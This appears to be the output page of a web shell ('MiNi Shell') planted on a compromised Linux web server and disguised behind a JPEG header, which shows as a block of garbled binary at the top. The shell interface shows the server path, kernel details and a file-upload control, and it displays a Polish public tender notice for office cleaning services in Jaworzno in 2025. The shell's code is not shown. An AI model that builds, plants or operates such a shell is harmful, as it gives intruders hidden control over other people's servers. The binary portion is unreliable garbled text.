JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241115/0059782901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa sprzątania i utrzymania w czystości pomieszczeń biurowych, sanitariatów, korytarzy, pomieszczeń socjalnych - kuchni i ciągów komunikacyjnych w OKE w Jaworznie w 2025r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OKRĘGOWA KOMISJA EGZAMINACYJNA W JAWORZNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276299083</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Adama Mickiewicza 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jaworzno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@oke.jaworzno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.oke.jaworzno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa sprzątania i utrzymania w czystości pomieszczeń biurowych, sanitariatów, korytarzy, pomieszczeń socjalnych - kuchni i ciągów komunikacyjnych w OKE w Jaworznie w 2025r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cf6121fa-6ce9-46be-a381-7b8854b9ea4f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00597829</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00525377/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa sprzątania i utrzymania w czystości pomieszczeń biurowych, sanitariatów, korytarzy, pomieszczeń socjalnych - kuchni i ciągów komunikacyjnych w OKE w Jaworznie w 2025 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-cf6121fa-6ce9-46be-a381-7b8854b9ea4f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e- Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Zamawiający nie zamierza komunikować się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej.<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami (za wyjątkiem złożenia oferty) odbywa się przy użyciu poczty elektronicznej (na adresy e-mail: przetargi@oke.jaworzno.pl) lub przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl (za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze”). We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>Zamawiający dopuszcza w szczególności następujący format przesyłanych danych: .pdf, .doc., .docx, .rtf, .xps, .odt.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB.<br/>W przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 ustawy Pzp Zamawiający będzie komunikował się z Wykonawcami w formie pisemnej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OKE.WOA.260.1.24.AD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi sprzątania i utrzymania w czystości pomieszczeń biurowych, sanitariatów, korytarzy, pomieszczeń socjalnych (kuchni) i ciągów komunikacyjnych w budynku Okręgowej Komisji Egzaminacyjnej znajdującym się w Jaworznie przy ul. Mickiewicza 4 w 2025 roku.<br/>1)	Podstawowe wymagania wobec usług sprzątania i utrzymania w czystości (zwanych dalej: „Usługami”):<br/>a)	Usługi będą świadczone zgodnie z harmonogramem prac (pkt 5 szczegółowego opisu przedmiotu zamówienia);<br/>b)	Pomieszczenia do sprzątania będą udostępnione Wykonawcy w godzinach 7.00-15.00 od poniedziałku do piątku (z wyłączeniem dni ustawowo wolnych od pracy);<br/>c)	W przypadku, gdy w budynku Zamawiającego będą się odbywały spotkania/konferencje itp. (z reguły z udziałem ok. 10-60 uczestników), Wykonawca – na żądanie Zamawiającego przekazane z co najmniej 3-dniowym wyprzedzeniem – zapewni, że w terminie takiego zdarzenia co najmniej jedna osoba ze strony Wykonawcy będzie dbała o czystość w toaletach, uzupełniała mydło, sprzątała pomieszczenia przed i po takim zdarzeniu i wykonywała inne czynności sprzątania;<br/>d)	Wykonawca odpowiada za organizację sprawnego przebiegu Usług;<br/>e)	Usługi należy wykonywać niezależnie od stanu wnętrz budynku, w tym także podczas i po przeprowadzeniu ewentualnych remontów;<br/>2)	Wymagania dotyczące personelu:<br/>a)	Usługi będą wykonywane przez personel Wykonawcy, którego wykaz obejmujący imię i nazwisko Wykonawca przedstawi Zamawiającemu w ciągu 3 dni od dnia zawarcia umowy w sprawie zamówienia publicznego. O każdej zmianie tego wykazu Wykonawca poinformuje Zamawiającego, przedkładając uaktualniony wykaz na co najmniej 2 dni przed wprowadzeniem zmiany;<br/>b)	Wykonawca skieruje do wykonywania Usług [z wyjątkiem czynności mycia okien (szyb i ram okiennych) oraz parapetów zewnętrznych i wewnętrznych, a także drzwi zewnętrznych] co najmniej 3 osoby wykonujące te czynności w pełnym wymiarze czasu pracy (8 godzin dziennie, a w przypadku osób posiadających znaczny lub umiarkowany stopień niepełnosprawności – 7 godzin dziennie) i zapewni wykonywanie Usług każdorazowo przez co najmniej 3 osoby w pełnym wymiarze czasu pracy, niezależnie od urlopów czy absencji chorobowej;<br/>c)	Mycie okien (szyb i ram okiennych) oraz parapetów zewnętrznych i wewnętrznych, a także drzwi zewnętrznych musi być wykonane przez osoby spełniające wymagania do wykonywania prac na wysokościach oraz odbywać się z wykorzystaniem odpowiedniego sprzętu, w tym drabin (niedopuszczalne jest poruszanie się po parapetach). W celu wykonania tych czynności Zamawiający umożliwi dostęp do pomieszczeń w godzinach 7.00-17.00 od poniedziałku do piątku, a w wyjątkowych sytuacjach (po uzgodnieniu) – także w soboty;<br/>d)	Osoby skierowane do wykonywania czynności wymienionych w pkt 2) lit. a) nie mogą w tym samym czasie wykonywać czynności wymienionych w pkt 2) lit. c) powyżej;<br/>3)	Wymagania dotyczące sprzętu i środków czystości:<br/>a)	Wykonawca będzie wykorzystywał do świadczenia Usług własne materiały i środki czystości dopuszczone do stosowania zgodnie z przepisami prawa, będzie ich używał zgodnie z przeznaczeniem i zaleceniem producenta;<br/>b)	Wykonawca będzie wykonywał Usługi przy użyciu własnego sprzętu;<br/>c)	Wykonawca zapewni na własny koszt środki czyszczące, dezynfekujące, konserwacyjne oraz worki na śmieci;<br/>d)	W ciągu 3 dni od dnia zawarcia umowy w sprawie zamówienia publicznego Wykonawca przedstawi Zamawiającemu do akceptacji wykaz środków czystości, materiałów i sprzętu, których zamierza używać do wykonywania Usług oraz będzie używał tylko tych, które zaakceptował Zamawiający. O każdej zmianie tego wykazu Wykonawca poinformuje Zamawiającego, przedkładając uaktualniony wykaz na co najmniej 2 dni przed wprowadzeniem zmiany, a także będzie zmieniał ten wykaz na każde żądanie Zamawiającego;<br/>e)	Zamawiający wymaga, aby środki chemiczne stosowane do wykonywania Usług były biodegradowalne;<br/>f)	Zamawiający udostępni Wykonawcy pomieszczenie z przeznaczeniem na przechowywanie urządzeń i sprzętu niezbędnego do wykonywania Usług. Wykonawca nie może wykorzystywać tego pomieszczenia do innych celów;<br/>4)	Wymagania formalne dotyczące wykonywania Usług:<br/>a)	Wykonawca jest zobowiązany w czasie wykonywania Usług zachować na terenie objętym umową należyty ład, porządek, przestrzegać przepisów bhp i p. poż.;<br/>b)	Wykonawca ponosi odpowiedzialność za szkody wyrządzone w związku z wykonywaniem niniejszego zamówienia;<br/>c)	Wykonawca zobowiązany jest do niezwłocznego zgłaszania Zamawiającemu w formie dokumentowej wszelkich usterek, zdarzeń losowych i awarii zaobserwowanych podczas wykonywania Usług;<br/>d)	Wykonawca jest zobowiązany do prowadzenia dziennika sprzątania (znajdującego się w obiekcie Zamawiającego), w którym będą odnotowane wszelkie zarzuty i zastrzeżenia Zamawiającego oraz wszelkie zgłoszenia Zamawiającego odnoszące się do Usług;<br/>e)	Zamawiający zastrzega sobie prawo do bieżącej kontroli sposobu i jakości świadczonych przez Wykonawcę Usług. Uchybienia stwierdzone w obecności pracownika Wykonawcy będą wpisywane do dziennika sprzątania z podaniem wyznaczonego przez Zamawiającego terminu ich usunięcia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90919000-2 - Usługi sprzątania biur i szkół oraz czyszczenia urządzeń biurowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi<br/>kryteriami:<br/>1)	cena (Cof) – waga 60% [60 pkt]<br/>W trakcie oceny ofert kolejno ocenianym ofertom zostaną przyznane punkty według następującego wzoru:<br/>Cn / Cx x 100 x 0,6 = liczba punktów Cof gdzie:<br/>Cn – najniższa cena spośród wszystkich ofert zaoferowanych przez Wykonawców, które nie zostały odrzucone<br/>Cx – cena zaoferowana w ocenianej ofercie<br/>liczba 100 – mnożnik zastosowany w celu uzyskania liczby punktów wyrażonej cyfrowo 0,6 – waga kryterium ceny<br/>Cof - liczba punktów, jaką uzyskała oferta Wykonawcy w kryterium cena<br/>2)	zwiększenie stawki procentowej kary umownej (Kof) – waga 40%	[40 pkt]<br/>W trakcie oceny ofert kolejno ocenianym ofertom zostaną przyznane punkty za zaoferowaną przez Wykonawcę stawkę procentową kary umownej za każdy przypadek niewykonania lub nienależytego wykonania jakiejkolwiek Usługi sprzątania, liczonej od kwoty wynagrodzenie brutto, o którym mowa w § 4 ust. 1 projektowanych postanowień umowy:<br/> 0,1% - 0 pkt,<br/> 0,2% - 10 pkt,<br/> 0,3% - 20 pkt,<br/> 0,4% - 30 pkt,<br/> 0,5% - 40 pkt.<br/>Jeżeli w formularzu ofertowym Wykonawca nie poda żadnej stawki procentowej kary umownej, Zamawiający przyjmie, że zaoferował stawkę 0,1%.<br/>2.	Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punków obliczoną według wzoru:<br/>Ł = Cof + Kn<br/>gdzie:<br/>Ł – końcowa łączna liczba punktów<br/>Cof – liczba punktów uzyskanych w kryterium: cena<br/>Kn – liczba punktów uzyskanych w kryterium: zwiększenie stawki procentowej kary umownej<br/>3.	Przy obliczaniu punktów Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż 5, to druga cyfra po przecinku nie ulega zmianie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zwiększenie stawki procentowej kary umownej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	warunki dotyczące sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni ten warunek udziału w postępowaniu, jeżeli wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie mniejszą niż 100.000,00 zł;<br/>2)	warunki dotyczące zdolności technicznej lub zawodowej:<br/>Wykonawca spełni ten warunek udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich<br/>3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje usługi sprzątania, łączna wartość których to usług świadczonych na podstawie jednej umowy w okresie nie dłuższym niż 6 następujących po sobie miesięcy jest nie mniejsza niż 50.000,00 zł <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.	Zamawiający przewiduje możliwość istotnych zmian postanowień niniejszej umowy w następujących przepadkach:<br/>1)	wystąpienia przeszkody o charakterze siły wyższej (zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia) – zmianie mogą ulec: zobowiązania objęte szczegółowym opisem przedmiotu zamówienia (załącznikiem nr 1 do niniejszej umowy) oraz wynagrodzenie Wykonawcy,<br/>2)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację niniejszej umowy (np. zmiana stawki podatku od towarów i usług) –zmianie mogą ulec: opis przedmiotu zamówienia (załącznik nr 1 do niniejszej umowy) oraz wynagrodzenie Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-22 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">drogą elektroniczną za pośrednictwem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-22 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com